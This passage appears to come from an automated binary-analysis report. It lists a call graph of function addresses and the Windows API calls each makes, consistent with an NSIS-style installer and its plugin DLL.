calls 5067->5070 5067->5073 5068 401723 GetShortPathNameW 5069 402c2a 5068->5069 5071 4016fe 5070->5071 5071->5073 5074 40653d lstrcpynW 5071->5074 5073->5068 5073->5069 5074->5073 5075 401e4e GetDC 5076 402d84 17 API calls 5075->5076 5077 401e60 GetDeviceCaps MulDiv ReleaseDC 5076->5077 5078 402d84 17 API calls 5077->5078 5079 401e91 5078->5079 5080 40657a 17 API calls 5079->5080 5081 401ece CreateFontIndirectW 5080->5081 5082 402638 5081->5082 5083 4045cf lstrcpynW lstrlenW 5084 402950 5085 402da6 17 API calls 5084->5085 5086 40295c 5085->5086 5087 402972 5086->5087 5088 402da6 17 API calls 5086->5088 5089 406008 2 API calls 5087->5089 5088->5087 5090 402978 5089->5090 5112 40602d GetFileAttributesW CreateFileW 5090->5112 5092 402985 5093 402a3b 5092->5093 5094 4029a0 GlobalAlloc 5092->5094 5095 402a23 5092->5095 5096 402a42 DeleteFileW 5093->5096 5097 402a55 5093->5097 5094->5095 5098 4029b9 5094->5098 5099 4032b4 31 API calls 5095->5099 5096->5097 5113 4034e5 SetFilePointer 5098->5113 5101 402a30 CloseHandle 5099->5101 5101->5093 5102 4029bf 5103 4034cf ReadFile 5102->5103 5104 4029c8 GlobalAlloc 5103->5104 5105 4029d8 5104->5105 5106 402a0c 5104->5106 5108 4032b4 31 API calls 5105->5108 5107 4060df WriteFile 5106->5107 5109 402a18 GlobalFree 5107->5109 5111 4029e5 5108->5111 5109->5095 5110 402a03 GlobalFree 5110->5106 5111->5110 5112->5092 5113->5102 5114 401956 5115 402da6 17 API calls 5114->5115 5116 40195d lstrlenW 5115->5116 5117 402638 5116->5117 4612 4014d7 4613 402d84 17 API calls 4612->4613 4614 4014dd Sleep 4613->4614 4616 402c2a 4614->4616 4617 4020d8 4618 40219c 4617->4618 4619 4020ea 4617->4619 4621 401423 24 API calls 4618->4621 4620 402da6 17 API calls 4619->4620 4622 4020f1 4620->4622 4628 4022f6 4621->4628 4623 402da6 17 API calls 4622->4623 4624 4020fa 4623->4624 4625 402110 LoadLibraryExW 4624->4625 4626 402102 GetModuleHandleW 4624->4626 4625->4618 4627 402121 4625->4627 4626->4625 4626->4627 4640 406979 4627->4640 4631 402132 4633 402151 4631->4633 4634 40213a 4631->4634 4632 40216b 4635 40559f 24 API calls 4632->4635 4645 71091817 4633->4645 4636 401423 24 API calls 4634->4636 4637 402142 4635->4637 4636->4637 4637->4628 4638 40218e FreeLibrary 4637->4638 4638->4628 4687 40655f WideCharToMultiByte 4640->4687 4642 406996 4643 40699d GetProcAddress 4642->4643 4644 40212c 4642->4644 4643->4644 4644->4631 4644->4632 4646 7109184a 4645->4646 4688 71091bff 4646->4688 4648 71091851 4649 71091976 4648->4649 4650 71091869 4648->4650 4651 71091862 4648->4651 4649->4637 4722 71092480 4650->4722 4738 7109243e 4651->4738 4656 710918cd 4662 7109191e 4656->4662 4663 710918d3 4656->4663 4657 710918af 4751 71092655 4657->4751 4658 71091898 4672 7109188e 4658->4672 4748 71092e23 4658->4748 4659 7109187f 4661 71091885 4659->4661 4666 71091890 4659->4666 4661->4672 4732 71092b98 4661->4732 4664 71092655 10 API calls 4662->4664 4770 71091666 4663->4770 4670 7109190f 4664->4670 4665 710918b5 4762 71091654 4665->4762 4742 71092810 4666->4742 4678 71091965 4670->4678 4776 71092618 4670->4776 4672->4656 4672->4657 4676 71091896 4676->4672 4677 71092655 10 API calls 4677->4670 4678->4649 4682 7109196f GlobalFree 4678->4682 4682->4649 4684 71091951 4684->4678 4780 710915dd wsprintfW 4684->4780 4685 7109194a FreeLibrary 4685->4684 4687->4642 4783 710912bb GlobalAlloc 4688->4783 4690 71091c26 4784 710912bb GlobalAlloc 4690->4784 4692 71091e6b GlobalFree GlobalFree GlobalFree 4693 71091e88 4692->4693 4713 71091ed2 4692->4713 4694 7109227e 4693->4694 4702 71091e9d 4693->4702 4693->4713 4696 710922a0 GetModuleHandleW 4694->4696 4694->4713 4695 71091d26 GlobalAlloc 4715 71091c31 4695->4715 4699 710922b1 LoadLibraryW 4696->4699 4700 710922c6 4696->4700 4697 71091d71 lstrcpyW 4701 71091d7b lstrcpyW 4697->4701 4698 71091d8f GlobalFree 4698->4715 4699->4700 4699->4713 4791 710916bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4700->4791 4701->4715 4702->4713 4787 710912cc 4702->4787 4704 71092126 4790 710912bb GlobalAlloc 4704->4790 4705 71092318 4707 71092325 lstrlenW 4705->4707 4705->4713 4792 710916bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4707->4792 4709 710922d8 4709->4705 4720 71092302 GetProcAddress 4709->4720 4711 71092067 GlobalFree 4711->4715 4712 710921ae 4712->4713 4719 71092216 lstrcpyW 4712->4719 4713->4648 4714 7109233f 4714->4713 4715->4692 4715->4695 4715->4697 4715->4698 4715->4701 4715->4704 4715->4711 4715->4712 4715->4713 4716 710912cc 2 API calls 4715->4716 4717 71091dcd 4715->4717 4716->4715 4717->4715 4785 7109162f GlobalSize GlobalAlloc 4717->4785 4719->4713 4720->4705 4721 7109212f 4721->4648 4728 71092498 4722->4728 4724 710925c1 GlobalFree 4727 7109186f 4724->4727 4724->4728 4725 7109256b GlobalAlloc CLSIDFromString 4725->4724 4726 71092540 GlobalAlloc WideCharToMultiByte 4726->4724 4727->4658 4727->4659 4727->4672 4728->4724 4728->4725 4728->4726 4729 710912cc GlobalAlloc lstrcpynW 4728->4729 4731 7109258a 4728->4731 4794 7109135a 4728->4794 4729->4728 4731->4724 4798 710927a4 4731->4798 4735 71092baa 4732->4735 4733 71092c4f CreateFileA 4734 71092c6d 4733->4734 4801 71092b42 4734->4801 4735->4733 4737 71092d39 4737->4672 4739 71092453 4738->4739 4740 7109245e GlobalAlloc 4739->4740 4741 71091868 4739->4741 4740->4739 4741->4650 4746 71092840 4742->4746 4743 710928db GlobalAlloc 4747 710928fe 4743->4747 4744 710928ee 4745 710928f4 GlobalSize 4744->4745 4744->4747 4745->4747 4746->4743 4746->4744 4747->4676 4749 71092e2e 4748->4749 4750 71092e6e GlobalFree 4749->4750 4805 710912bb GlobalAlloc 4751->4805 4753 710926d8 MultiByteToWideChar 4760 7109265f 4753->4760 4754 7109270b lstrcpynW 4754->4760 4755 710926fa StringFromGUID2 4755->4760 4756 71092742 GlobalFree 4756->4760 4757 7109271e wsprintfW 4757->4760 4758 71092777 GlobalFree 4758->4665 4759 71091312 2 API calls 4759->4760 4760->4753 4760->4754 4760->4755 4760->4756 4760->4757 4760->4758 4760->4759 4806 71091381 4760->4806 4810 710912bb GlobalAlloc 4762->4810 4764 71091659 4765 71091666 2 API calls 4764->4765 4766 71091663 4765->4766 4767 71091312 4766->4767 4768 7109131b GlobalAlloc lstrcpynW 4767->4768 4769 71091355 GlobalFree 4767->4769 4768->4769 4769->4670 4771 7109169f lstrcpyW 4770->4771 4772 71091672 wsprintfW 4770->4772 4775 710916b8 4771->4775 4772->4775 4775->4677 4777 71092626 4776->4777 4779 71091931 4776->4779 4778 71092642 GlobalFree 4777->4778 4777->4779 4778->4777 4779->4684 4779->4685 4781 71091312 2 API calls 4780->4781 4782 710915fe 4781->4782 4782->4678 4783->4690 4784->4715 4786 7109164d 4785->4786 4786->4717 4793 710912bb GlobalAlloc 4787->4793 4789 710912db lstrcpynW 4789->4713 4790->4721 4791->4709 4792->4714 4793->4789 4795 71091361 4794->4795 4796 710912cc 2 API calls 4795->4796 4797 7109137f 4796->4797 4797->4728 4799 71092808 4798->4799 4800 710927b2 VirtualAlloc 4798->4800 4799->4731 4800->4799 4802 71092b4d 4801->4802 4803 71092b5d 4802->4803 4804 71092b52 GetLastError 4802->4804 4803->4737 4804->4803 4805->4760 4807 7109138a 4806->4807 4808 710913ac 4806->4808 4807->4808 4809 71091390 lstrcpyW 4807->4809 4808->4760 4809->4808 4810->4764 5118 404658 5119 404670 5118->5119 5123 40478a 5118->5123 5124 404499 18 API calls 5119->5124 5120 4047f4 5121 4048be 5120->5121 5122 4047fe GetDlgItem 5120->5122 5129 404500 8 API calls 5121->5129 5125 404818 5122->5125 5126 40487f 5122->5126 5123->5120 5123->5121 5127 4047c5 GetDlgItem SendMessageW 5123->5127 5128 4046d7 5124->5128 5125->5126 5134 40483e SendMessageW LoadCursorW SetCursor 5125->5134 5126->5121 5130 404891 5126->5130 5151 4044bb KiUserCallbackDispatcher 5127->5151 5132 404499 18 API calls 5128->5132 5133 4048b9 5129->5133 5135 4048a7 5130->5135 5136 404897 SendMessageW 5130->5136 5138 4046e4 CheckDlgButton 5132->5138 5155 404907 5134->5155 5135->5133 5141 4048ad SendMessageW 5135->5141 5136->5135 5137 4047ef 5152 4048e3 5137->5152 5149 4044bb KiUserCallbackDispatcher 5138->5149 5141->5133 5144 404702 GetDlgItem 5150 4044ce SendMessageW 5144->5150 5146 404718 SendMessageW 5147 404735 GetSysColor 5146->5147 5148 40473e SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5146->5148 5147->5148 5148->5133 5149->5144 5150->5146 5151->5137 5153 4048f1 5152->5153 5154 4048f6 SendMessageW 5152->5154 5153->5154 5154->5120 5158 405b63 ShellExecuteExW 5155->5158 5157 40486d LoadCursorW SetCursor 5157->5126 5158->5157 5159 402b59 5160 402b60 5159->5160 5161 402bab 5159->5161 5163 402ba9 5160->5163 5165 402d84 17 API calls 5160->5165 5162 40690a 5 API calls 5161->5162 5164 402bb2 5162->5164 5166 402da6 17 API calls 5164->5166 5167 402b6e 5165->5167 5168 402bbb 5166->5168 5169 402d84 17 API calls 5167->5169 5168->5163 5170 402bbf IIDFromString 5168->5170 5172 402b7a 5169->5172 5170->5163 5171 402bce 5170->5171 5171->5163 5177 40653d lstrcpynW 5171->5177 5176 406484 wsprintfW 5172->5176 5174 402beb CoTaskMemFree 5174->5163 5176->5163 5177->5174 4944 40175c 4945 402da6 17 API calls 4944->4945 4946 401763 4945->4946 4947 40605c 2 API calls 4946->4947 4948 40176a 4947->4948 4949 40605c 2 API calls 4948->4949 4949->4948 5178 401d5d 5179 402d84 17 API calls 5178->5179 5180 401d6e SetWindowLongW 5179->5180 5181 402c2a 5180->5181 4950 401ede 4951 402d84 17 API calls 4950->4951 4952 401ee4 4951->4952 4953 402d84 17 API calls 4952->4953 4954 401ef0 4953->4954 4955 401f07 EnableWindow 4954->4955 4956 401efc ShowWindow 4954->4956 4957 402c2a 4955->4957 4956->4957 4958 4056de 4959 405888 4958->4959 4960 4056ff GetDlgItem GetDlgItem GetDlgItem 4958->4960 4962 405891 GetDlgItem CreateThread CloseHandle 4959->4962 4963 4058b9 4959->4963 5004 4044ce SendMessageW 4960->5004 4962->4963 5007 405672 5 API calls 4962->5007 4965 4058e4 4963->4965 4967 4058d0 ShowWindow ShowWindow 4963->4967 4968 405909 4963->4968 4964 40576f 4973 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4964->4973 4966 4058f0 4965->4966 4974 405944 4965->4974 4970 4058f8 4966->4970 4971 40591e ShowWindow 4966->4971 5006 4044ce SendMessageW 4967->5006 4972 404500 8 API calls 4968->4972 4975 404472 SendMessageW 4970->4975 4977 405930 4971->4977 4978 40593e 4971->4978 4976 405917 4972->4976 4979 4057e4 4973->4979 4980 4057c8 SendMessageW SendMessageW 4973->4980 4974->4968 4981 405952 SendMessageW 4974->4981 4975->4968 4985 40559f 24 API calls 4977->4985 4986 404472 SendMessageW 4978->4986 4982 4057f7 4979->4982 4983 4057e9 SendMessageW 4979->4983 4980->4979 4981->4976 4984 40596b CreatePopupMenu 4981->4984 4988 404499 18 API calls 4982->4988 4983->4982 4987 40657a 17 API calls 4984->4987 4985->4978 4986->4974 4989 40597b AppendMenuW 4987->4989 4990 405807 4988->4990 4991 405998 GetWindowRect 4989->4991 4992 4059ab TrackPopupMenu 4989->4992 4993 405810 ShowWindow 4990->4993 4994 405844 GetDlgItem SendMessageW 4990->4994 4991->4992 4992->4976 4995 4059c6 4992->4995 4996 405826 ShowWindow 4993->4996 4999 405833 4993->4999 4994->4976 4997 40586b SendMessageW SendMessageW 4994->4997 4998 4059e2 SendMessageW 4995->4998 4996->4999 4997->4976 4998->4998 5000 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4998->5000 5005 4044ce SendMessageW 4999->5005 5002 405a24 SendMessageW 5000->5002 5002->5002 5003 405a4d GlobalUnlock SetClipboardData CloseClipboard 5002->5003 5003->4976 5004->4964 5005->4994 5006->4965 5182 4028de 5183 4028e6 5182->5183 5184 4028ea FindNextFileW 5183->5184 5187 4028fc 5183->5187 5185 402943 5184->5185 5184->5187 5188 40653d lstrcpynW 5185->5188 5188->5187 5189 404ce0 5190 404cf0 5189->5190 5191 404d0c 5189->5191 5200 405b81 GetDlgItemTextW 5190->5200 5193 404d12 SHGetPathFromIDListW 5191->5193 5194 404d3f 5191->5194 5196 404d29 SendMessageW 5193->5196 5197 404d22 5193->5197 5195 404cfd SendMessageW 5195->5191 5196->5194 5198 40140b 2 API calls 5197->5198 5198->5196 5200->5195 5201 401563 5202 402ba4 5201->5202 5205 406484 wsprintfW 5202->5205 5204 402ba9 5205->5204 5206 401de4 LoadImageW SendMessageW 5207 401e33 5206->5207 5209 401e3f 5206->5209 5208 401e38 DeleteObject 5207->5208 5207->5209 5208->5209 5210 401968 5211 402d84 17 API calls 5210->5211 5212 40196f 5211->5212 5213 402d84 17 API calls 5212->5213 5214 40197c 5213->5214 5215 402da6 17 API calls 5214->5215 5216 401993 lstrlenW 5215->5216 5217 4019a4 5216->5217 5218 4019e5 5217->5218 5222 40653d lstrcpynW 5217->5222 5220 4019d5 5220->5218 5221 4019da lstrlenW 5220->5221 5221->5218 5222->5220 5223 40166a 5224 402da6 17 API calls 5223->5224 5225 401670 5224->5225 5226 406873 2 API calls 5225->5226 5227 401676 5226->5227 5228 402aeb 5229 402d84 17 API calls 5228->5229 5230 402af1 5229->5230 5231 40657a 17 API calls 5230->5231 5232 40292e 5230->5232 5231->5232 4236 4026ec 4237 402d84 17 API calls 4236->4237 4239 4026fb 4237->4239 4238 402838 4239->4238 4240 402745 ReadFile 4239->4240 4241 4060b0 ReadFile 4239->4241 4242 4027de 4239->4242 4243 402785 MultiByteToWideChar 4239->4243 4244 40283a 4239->4244 4247 4027ab SetFilePointer MultiByteToWideChar 4239->4247 4248 40284b 4239->4248 4240->4238 4240->4239 4241->4239 4242->4238 4242->4239 4250 40610e SetFilePointer 4242->4250 4243->4239 4259 406484 wsprintfW 4244->4259 4247->4239 4248->4238 4249 40286c SetFilePointer 4248->4249 4249->4238 4251 40612a 4250->4251 4258 406142 4250->4258 4252 4060b0 ReadFile 4251->4252 4253 406136 4252->4253 4254 406173 SetFilePointer 4253->4254 4255 40614b SetFilePointer 4253->4255 4253->4258 4254->4258 4255->4254 4256 406156 4255->4256 4257 4060df WriteFile 4256->4257 4257->4258 4258->4242 4259->4238 4518 40176f 4519 402da6 17 API calls 4518->4519 4520 401776 4519->4520 4521 401796 4520->4521 4522 40179e 4520->4522 4557 40653d lstrcpynW 4521->4557 4558 40653d lstrcpynW 4522->4558 4525 4017a9 4526 405e0c 3 API calls 4525->4526 4528 4017af lstrcatW 4526->4528 4527 40179c 4529 4067c4 5 API calls 4527->4529 4528->4527 4545 4017bb 4529->4545 4530 406873 2 API calls 4530->4545 4531 406008 2 API calls 4531->4545 4533 4017cd CompareFileTime 4533->4545 4534 40188d 4536 40559f 24 API calls 4534->4536 4535 401864 4537 40559f 24 API calls 4535->4537 4554 401879 4535->4554 4539 401897 4536->4539 4537->4554 4538 40653d lstrcpynW 4538->4545 4540 4032b4 31 API calls 4539->4540 4541 4018aa 4540->4541 4542 4018be SetFileTime 4541->4542 4544 4018d0 CloseHandle 4541->4544 4542->4544 4543 40657a 17 API calls 4543->4545 4546 4018e1 4544->4546 4544->4554 4545->4530 4545->4531 4545->4533 4545->4534 4545->4535 4545->4538 4545->4543 4553 405b9d MessageBoxIndirectW 4545->4553 4556 40602d GetFileAttributesW CreateFileW 4545->4556 4547 4018e6 4546->4547 4548 4018f9 4546->4548 4550 40657a 17 API calls 4547->4550 4549 40657a 17 API calls 4548->4549 4552 401901 4549->4552 4551 4018ee lstrcatW 4550->4551 4551->4552 4552->4554 4555 405b9d MessageBoxIndirectW 4552->4555 4553->4545 4555->4554 4556->4545 4557->4527 4558->4525 5233 401a72 5234 402d84 17 API calls 5233->5234 5235 401a7b 5234->5235 5236 402d84 17 API calls 5235->5236 5237 401a20 5236->5237 4568 401573 4569 401583 ShowWindow 4568->4569 4570 40158c 4568->4570 4569->4570 4571 402c2a 4570->4571 4572 40159a ShowWindow 4570->4572 4572->4571 5238 7109103d 5239 7109101b 5 API calls 5238->5239 5240 71091056 5239->5240 5241 4023f4 5242 402da6 17 API calls 5241->5242 5243 402403 5242->5243 5244 402da6 17 API calls 5243->5244 5245 40240c 5244->5245 5246 402da6 17 API calls 5245->5246 5247 402416 GetPrivateProfileStringW 5246->5247 5248 4014f5 SetForegroundWindow 5249 402c2a 5248->5249 5250 401ff6 5251 402da6 17 API calls 5250->5251 5252 401ffd 5251->5252 5253 406873 2 API calls 5252->5253 5254 402003 5253->5254 5256 402014 5254->5256 5257 406484 wsprintfW 5254->5257 5257->5256 5258 401b77 5259 402da6 17 API calls 5258->5259 5260 401b7e 5259->5260 5261 402d84 17 API calls 5260->5261 5262 401b87 wsprintfW 5261->5262 5263 402c2a 5262->5263 4907 40167b 4908 402da6 17 API calls 4907->4908 4909 401682 4908->4909 4910 402da6 17 API calls 4909->4910 4911 40168b 4910->4911 4912 402da6 17 API calls 4911->4912 4913 401694 MoveFileW 4912->4913 4914 4016a0 4913->4914 4915 4016a7 4913->4915 4916 401423 24 API calls 4914->4916 4917 406873 2 API calls 4915->4917 4919 4022f6 4915->4919 4916->4919 4918 4016b6 4917->4918 4918->4919 4920 4062fd 36 API calls 4918->4920 4920->4914 5264 4022ff 5265 402da6 17 API calls 5264->5265 5266 402305 5265->5266 5267 402da6 17 API calls 5266->5267 5268 40230e 5267->5268 5269 402da6 17 API calls 5268->5269 5270 402317 5269->5270 5271 406873 2 API calls 5270->5271 5272 402320 5271->5272 5273 402331 lstrlenW lstrlenW 5272->5273 5274 402324 5272->5274 5276 40559f 24 API calls 5273->5276 5275 40559f 24 API calls 5274->5275 5278 40232c 5274->5278 5275->5278 5277 40236f SHFileOperationW 5276->5277 5277->5274 5277->5278 5279 4019ff 5280 402da6 17 API calls 5279->5280 5281 401a06 5280->5281 5282 402da6 17 API calls 5281->5282 5283 401a0f 5282->5283 5284 401a16 lstrcmpiW 5283->5284 5285 401a28 lstrcmpW 5283->5285 5286 401a1c 5284->5286 5285->5286 5287 401000 5288 401037 BeginPaint GetClientRect 5287->5288 5289 40100c DefWindowProcW 5287->5289 5290 4010f3 5288->5290 5292 401179 5289->5292 5293 401073 CreateBrushIndirect FillRect DeleteObject 5290->5293 5294 4010fc 5290->5294 5293->5290 5295 401102 CreateFontIndirectW 5294->5295 5296 401167 EndPaint 5294->5296 5295->5296 5297 401112 6 API calls 5295->5297 5296->5292 5297->5296 5298 401503 5299 40150b 5298->5299 5301 40151e 5298->5301 5300 402d84 17 API calls 5299->5300 5300->5301 5302 402383 5303 40238a 5302->5303 5306 40239d 5302->5306 5304 40657a 17 API calls 5303->5304 5305 402397 5304->5305 5305->5306 5307 405b9d MessageBoxIndirectW 5305->5307 5307->5306 5308 402c05 SendMessageW 5309 402c2a 5308->5309 5310 402c1f InvalidateRect 5308->5310 5310->5309 5311 404f06 GetDlgItem GetDlgItem 5312 404f58 7 API calls 5311->5312 5320 40517d 5311->5320 5313 404ff2 SendMessageW 5312->5313 5314 404fff DeleteObject 5312->5314 5313->5314 5315 405008 5314->5315 5316 40503f 5315->5316 5321 40657a 17 API calls 5315->5321 5318 404499 18 API calls 5316->5318 5317 40525f 5319 40530b 5317->5319 5323 405170 5317->5323 5329 4052b8 SendMessageW 5317->5329 5322 405053 5318->5322 5324 405315 SendMessageW 5319->5324 5325 40531d 5319->5325 5320->5317 5345 4051ec 5320->5345 5365 404e54 SendMessageW 5320->5365 5326 405021 SendMessageW SendMessageW 5321->5326 5328 404499 18 API calls 5322->5328 5331 404500 8 API calls 5323->5331 5324->5325 5332 405336 5325->5332 5333 40532f ImageList_Destroy 5325->5333 5340 405346 5325->5340 5326->5315 5346 405064 5328->5346 5329->5323 5335 4052cd SendMessageW 5329->5335 5330 405251 SendMessageW 5330->5317 5336 40550c 5331->5336 5337 40533f GlobalFree 5332->5337 5332->5340 5333->5332 5334 4054c0 5334->5323 5341 4054d2 ShowWindow GetDlgItem ShowWindow 5334->5341 5339 4052e0 5335->5339 5337->5340 5338 40513f GetWindowLongW SetWindowLongW 5342 405158 5338->5342 5350 4052f1 SendMessageW 5339->5350 5340->5334 5355 405381 5340->5355 5370 404ed4 5340->5370 5341->5323 5343 405175 5342->5343 5344 40515d ShowWindow 5342->5344 5364 4044ce SendMessageW 5343->5364 5363 4044ce SendMessageW 5344->5363 5345->5317 5345->5330 5346->5338 5349 4050b7 SendMessageW 5346->5349 5351 40513a 5346->5351 5352 4050f5 SendMessageW 5346->5352 5353 405109 SendMessageW 5346->5353 5349->5346 5350->5319 5351->5338 5351->5342 5352->5346 5353->5346 5358 4053af SendMessageW 5355->5358 5360 4053c5 5355->5360 5356 40548b 5357 405496 InvalidateRect 5356->5357 5359 4054a2 5356->5359 5357->5359 5358->5360 5359->5334 5379 404e0f 5359->5379 5360->5356 5361 405439 SendMessageW SendMessageW 5360->5361 5361->5360 5363->5323 5364->5320 5366 404eb3 SendMessageW 5365->5366 5367 404e77 GetMessagePos ScreenToClient SendMessageW 5365->5367 5369 404eab 5366->5369 5368 404eb0 5367->5368 5367->5369 5368->5366 5369->5345 5382 40653d lstrcpynW 5370->5382 5372 404ee7 5383 406484 wsprintfW 5372->5383 5374 404ef1 5375 40140b 2 API calls 5374->5375 5376 404efa 5375->5376 5384 40653d lstrcpynW 5376->5384 5378 404f01 5378->5355 5385 404d46 5379->5385 5381 404e24 5381->5334 5382->5372 5383->5374 5384->5378 5386 404d5f 5385->5386 5387 40657a 17 API calls 5386->5387 5388 404dc3 5387->5388 5389 40657a 17 API calls 5388->5389 5390 404dce 5389->5390 5391 40657a 17 API calls 5390->5391 5392 404de4 lstrlenW wsprintfW SetDlgItemTextW 5391->5392 5392->5381 5393 404609 lstrlenW 5394 404628 5393->5394 5395 40462a WideCharToMultiByte 5393->5395 5394->5395 4184 40248a 4185 402da6 17 API calls 4184->4185 4186 40249c 4185->4186 4187 402da6 17 API calls 4186->4187 4188 4024a6 4187->4188 4201 402e36 4188->4201 4191 402c2a 4192 4024de 4194 4024ea 4192->4194 4205 402d84 4192->4205 4193 402da6 17 API calls 4196 4024d4 lstrlenW 4193->4196 4195 402509 RegSetValueExW 4194->4195 4208 4032b4 4194->4208 4199 40251f RegCloseKey 4195->4199 4196->4192 4199->4191 4202 402e51 4201->4202 4228 4063d8 4202->4228 4206 40657a 17 API calls 4205->4206 4207 402d99 4206->4207 4207->4194 4209 4032cd 4208->4209 4210 4032fb 4209->4210 4235 4034e5 SetFilePointer 4209->4235 4232 4034cf 4210->4232 4214 403468 4216 4034aa 4214->4216 4221 40346c 4214->4221 4215 403318 GetTickCount 4217 403452 4215->4217 4224 403367 4215->4224 4218 4034cf ReadFile 4216->4218 4217->4195 4218->4217 4219 4034cf ReadFile 4219->4224 4220 4034cf ReadFile 4220->4221 4221->4217 4221->4220 4222 4060df WriteFile 4221->4222 4222->4221 4223 4033bd GetTickCount 4223->4224 4224->4217 4224->4219 4224->4223 4225 4033e2 MulDiv wsprintfW 4224->4225 4227 4060df WriteFile 4224->4227 4226 40559f 24 API calls 4225->4226 4226->4224 4227->4224 4229 4063e7 4228->4229 4230 4063f2 RegCreateKeyExW 4229->4230 4231 4024b6 4229->4231 4230->4231 4231->4191 4231->4192 4231->4193 4233 4060b0 ReadFile 4232->4233 4234 403306 4233->4234 4234->4214 4234->4215 4234->4217 4235->4210 5396 71092d43 5397 71092d5b 5396->5397 5398 7109162f 2 API calls 5397->5398 5399 71092d76 5398->5399 5400 40498a 5401 4049b6 5400->5401 5402 4049c7 5400->5402 5461 405b81 GetDlgItemTextW 5401->5461 5404 4049d3 GetDlgItem 5402->5404 5405 404a32 5402->5405 5410 4049e7 5404->5410 5412 40657a 17 API calls 5405->5412 5421 404b16 5405->5421 5459 404cc5 5405->5459 5406 4049c1 5407 4067c4 5 API calls 5406->5407 5407->5402 5409 4049fb SetWindowTextW 5414 404499 18 API calls 5409->5414 5410->5409 5411 405eb7 4 API calls 5410->5411 5416 4049f1 5411->5416 5417 404aa6 SHBrowseForFolderW 5412->5417 5413 404b46 5418 405f14 18 API calls 5413->5418 5419 404a17 5414->5419 5415 404500 8 API calls 5420 404cd9 5415->5420 5416->5409 5425 405e0c 3 API calls 5416->5425 5417->5421 5422 404abe CoTaskMemFree 5417->5422 5423 404b4c 5418->5423 5424 404499 18 API calls 5419->5424 5421->5459 5463 405b81 GetDlgItemTextW 5421->5463 5426 405e0c 3 API calls 5422->5426 5464 40653d lstrcpynW 5423->5464 5427 404a25 5424->5427 5425->5409 5428 404acb 5426->5428 5462 4044ce SendMessageW 5427->5462 5431 404b02 SetDlgItemTextW 5428->5431 5436 40657a 17 API calls 5428->5436 5431->5421 5432 404a2b 5434 40690a 5 API calls 5432->5434 5433 404b63 5435 40690a 5 API calls 5433->5435 5434->5405 5442 404b6a 5435->5442 5437 404aea lstrcmpiW 5436->5437 5437->5431 5440 404afb lstrcatW 5437->5440 5438 404bab 5465 40653d lstrcpynW 5438->5465 5440->5431 5441 404bb2 5443 405eb7 4 API calls 5441->5443 5442->5438 5446 405e58 2 API calls 5442->5446 5448 404c03 5442->5448 5444 404bb8 GetDiskFreeSpaceW 5443->5444 5447 404bdc MulDiv 5444->5447 5444->5448 5446->5442 5447->5448 5449 404c74 5448->5449 5451 404e0f 20 API calls 5448->5451 5450 404c97 5449->5450 5452 40140b 2 API calls 5449->5452 5466 4044bb KiUserCallbackDispatcher 5450->5466 5453 404c61 5451->5453 5452->5450 5455 404c76 SetDlgItemTextW 5453->5455 5456 404c66 5453->5456 5455->5449 5458 404d46 20 API calls 5456->5458 5457 404cb3 5457->5459 5460 4048e3 SendMessageW 5457->5460 5458->5449 5459->5415 5460->5459 5461->5406 5462->5432 5463->5413 5464->5433 5465->5441 5466->5457 5467 40290b 5468 402da6 17 API calls 5467->5468 5469 402912 FindFirstFileW 5468->5469 5470 40293a 5469->5470 5474 402925 5469->5474 5471 402943 5470->5471 5475 406484 wsprintfW 5470->5475 5476 40653d lstrcpynW 5471->5476 5475->5471 5476->5474 5477 40190c 5478 401943 5477->5478 5479 402da6 17 API calls 5478->5479 5480 401948 5479->5480 5481 405c49 67 API calls 5480->5481 5482 401951 5481->5482 5483 40190f 5484 402da6 17 API calls 5483->5484 5485 401916 5484->5485 5486 405b9d MessageBoxIndirectW 5485->5486 5487 40191f 5486->5487 4559 402891 4560 402898 4559->4560 4563 402ba9 4559->4563 4561 402d84 17 API calls 4560->4561 4562 40289f 4561->4562 4564 4028ae SetFilePointer 4562->4564 4564->4563 4565 4028be 4564->4565 4567 406484 wsprintfW 4565->4567 4567->4563 5488 401491 5489 40559f 24 API calls 5488->5489 5490 401498 5489->5490 5491 71091058 5493 71091074 5491->5493 5492 710910dd 5493->5492 5494 710915b6 GlobalFree 5493->5494 5495 71091092 5493->5495 5494->5495 5496 710915b6 GlobalFree 5495->5496 5497 710910a2 5496->5497 5498 710910a9 GlobalSize 5497->5498 5499 710910b2 5497->5499 5498->5499 5500 710910c7 5499->5500 5501 710910b6 GlobalAlloc 5499->5501 5503 710910d2 GlobalFree 5500->5503 5502 710915dd 3 API calls 5501->5502 5502->5500 5503->5492 5504 401f12 5505 402da6 17 API calls 5504->5505 5506 401f18 5505->5506 5507 402da6 17 API calls 5506->5507 5508 401f21 5507->5508 5509 402da6 17 API calls 5508->5509 5510 401f2a 5509->5510 5511 402da6 17 API calls 5510->5511 5512 401f33 5511->5512 5513 401423 24 API calls 5512->5513 5514 401f3a 5513->5514 5521 405b63 ShellExecuteExW 5514->5521 5516 401f82 5517 40292e 5516->5517 5518 4069b5 5 API calls 5516->5518 5519 401f9f CloseHandle 5518->5519 5519->5517 5521->5516 5522 405513 5523 405523 5522->5523 5524 405537 5522->5524 5525 405580 5523->5525 5526 405529 5523->5526 5527 40553f IsWindowVisible 5524->5527 5533 405556 5524->5533 5528 405585 CallWindowProcW 5525->5528 5529 4044e5 SendMessageW 5526->5529 5527->5525 5530 40554c 5527->5530 5531 405533 5528->5531 5529->5531 5532 404e54 5 API calls 5530->5532 5532->5533 5533->5528 5534 404ed4 4 API calls 5533->5534 5534->5525 5535 402f93 5536 402fa5 SetTimer 5535->5536 5537 402fbe 5535->5537 5536->5537 5538 403013 5537->5538 5539 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5537->5539 5539->5538 5540 401d17 5541 402d84 17 API calls 5540->5541 5542 401d1d IsWindow 5541->5542 5543 401a20 5542->5543 4811 403f9a 4812 403fb2 4811->4812 4813 404113 4811->4813 4812->4813 4814 403fbe 4812->4814 4815 404124 GetDlgItem GetDlgItem 4813->4815 4820 404164 4813->4820 4817 403fc9 SetWindowPos 4814->4817 4818 403fdc 4814->4818 4819 404499 18 API calls 4815->4819 4816 4041be 4821 4044e5 SendMessageW 4816->4821 4831 40410e 4816->4831 4817->4818 4822 403fe5 ShowWindow 4818->4822 4823 404027 4818->4823 4824 40414e SetClassLongW 4819->4824 4820->4816 4825 401389 2 API calls 4820->4825 4874 4041d0 4821->4874 4826 404100 